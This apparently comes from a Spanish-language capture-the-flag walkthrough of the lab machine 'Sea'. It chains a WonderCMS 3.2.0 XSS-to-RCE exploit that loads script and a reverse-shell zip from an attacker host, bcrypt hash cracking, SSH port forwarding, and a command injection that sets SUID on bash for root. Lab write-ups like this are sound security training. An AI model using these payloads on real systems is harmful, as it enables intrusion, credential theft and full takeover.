Sea
OS: Linux
Dificultad: Fácil
Puntos: 20
Nmap Scan
nmap -v -p- --min-rate=5000 10.129.236.229
nmap -p 22,80 -sV -sC -oN nmap.txt 10.129.236.229
Nmap scan report for 10.129.236.229
Host is up (0.028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeracion
Enumeramos directorios de la aplicacion web.
gobuster dir -u http://10.129.236.229/ -w /usr/share/wordlists/dirb/big.txt -t 20
/0 (Status: 200) [Size: 3685]
/404 (Status: 200) [Size: 3376]
/data (Status: 301) [Size: 235] [--> http://10.129.236.229/data/]
/home (Status: 200) [Size: 3685]
/messages (Status: 301) [Size: 239] [--> http://10.129.236.229/messages/]
/plugins (Status: 301) [Size: 238] [--> http://10.129.236.229/plugins/]
/themes (Status: 301) [Size: 237] [--> http://10.129.236.229/themes/]
gobuster dir -u http://10.129.236.229/themes/ -w /usr/share/wordlists/dirb/big.txt -t 20
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/404 (Status: 200) [Size: 3376]
/Documents and Settings (Status: 403) [Size: 199]
/Program Files (Status: 403) [Size: 199]
/bike (Status: 301) [Size: 242] [--> http://10.129.236.229/themes/bike/]
/contact us (Status: 403) [Size: 199]
/donate cash (Status: 403) [Size: 199]
gobuster dir -u http://10.129.236.229/themes/bike/ -w /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt -t 20
/admin/home (Status: 200) [Size: 3685]
/LICENSE (Status: 200) [Size: 1067]
/README.md (Status: 200) [Size: 318]
/sym/root/home/ (Status: 200) [Size: 3685]
/version (Status: 200) [Size: 6]
Vemos un archivo README.md que meciona la tecnologia que estan utilizando.
┌──(root㉿kali)-[~/Sea]
└─# curl http://sea.htb/themes/bike/README.md
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
Al igual que ubicamos la version.
┌──(root㉿kali)-[~/Sea]
└─# curl http://sea.htb/themes/bike/version
3.2.0
Wonder CMS v.3.2.0 (RCE)
Encontramos el siguiente exploit para obtener RCE.
Para que funcione el script necesitamos realizar algunos cambios.
#var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = "http://sea.htb";
...
...
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.50/shell.zip&directoryName=violet&type=themes&token=" + token;
...
...
xhr4.open("GET", urlWithoutLogBase+"/themes/shell/rev.php");
...
...
xhr5.open("GET", urlWithoutLogBase+"/themes/shell/rev.php?lhost=" + ip + "&lport=" + port);
...
...
http://sea.htb/index.php?page=loginURL?"></form><script src="http://10.10.14.50/xss.js"></script><form action="
...
...
XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+"/xss.js\"></script><form+action=\""
...
...
os.system("python3 -m http.server 80\n")
Ahora creamos nuestro archivo zip que contendra la reverse shell.
┌──(root㉿kali)-[~/Sea]
└─# mkdir shell
┌──(root㉿kali)-[~/Sea]
└─# cp /usr/share/webshells/php/php-reverse-shell.php shell/rev.php
Modificamos nuestra IP en el archivo.
$ip = '10.10.14.50'; // CHANGE THIS
$port = 1234; // CHANGE THIS
Creamos el zip.
┌──(root㉿kali)-[~/Sea]
└─# zip -r shell.zip shell/
adding: shell/ (stored 0%)
adding: shell/rev.php (deflated 59%)
Ejecutamos el script.
python3 exploit.py 'http://sea.htb/loginURL' 10.10.14.50 1234
Enviamos nuestro payload desde el formulario de contacto y en el apartado de website.
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.50/xss.js"></script><form+action="
Esperamos un momento y obtenemos nuestra reverse shell.
Lateral Movement
Encontramos un hash en la siguiente ruta.
www-data@sea:/var/www/sea/data$ cat database.js
{
"config": {
"siteTitle": "Sea",
"theme": "bike",
"defaultPage": "home",
"login": "loginURL",
"forceLogout": false,
"forceHttps": false,
"saveChangesPopup": false,
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
Es posible crackearlo pero necesitamos remover los backslash.
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
Crackeamos el hash y obtenemos el password.
┌──(root㉿kali)-[~/Sea]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:42 DONE (2024-08-12 08:48) 0.02348g/s 71.86p/s 71.86c/s 71.86C/s chaparra..memories
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Nos conectamos por SSH.
┌──(root㉿kali)-[~/Sea]
└─# ssh amay@sea.htb
amay@sea.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)
Last login: Mon Aug 12 12:50:20 2024 from 10.10.14.50
amay@sea:~$ id
uid=1000(amay) gid=1000(amay) groups=1000(amay)
Privilege Escalation
Vemos el puerto 8080 abierto localmente.
amay@sea:~$ netstat -putona
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN - off (0.00/0/0)
Hacemos portfoward de es puerto a nuestra maquina.
ssh amay@sea.htb -L 8888:127.0.0.1:8080
Nos saltara un formulario de autenticacion podemos utilizar las mismas credenciales.
amay : mychemicalromance
Probando la aplicacion web encontramos un command injection de la siguiente forma.
log_file=;id;test&analyze_log=
Desde este punto podemos hacer varias cosas, le daremos SUID al binario bash para escalar privilegios.
log_file=;chmod 4777 /bin/bash;test&analyze_log=
Ahora desde la terminal podemos ser root.
amay@sea:~$ /bin/bash -p
bash-5.0# id
uid=1000(amay) gid=1000(amay) euid=0(root) groups=1000(amay)
bash-5.0# cat /root/root.txt
3e050709de4f9b9c0c5affc3e5901a23
bash-5.0#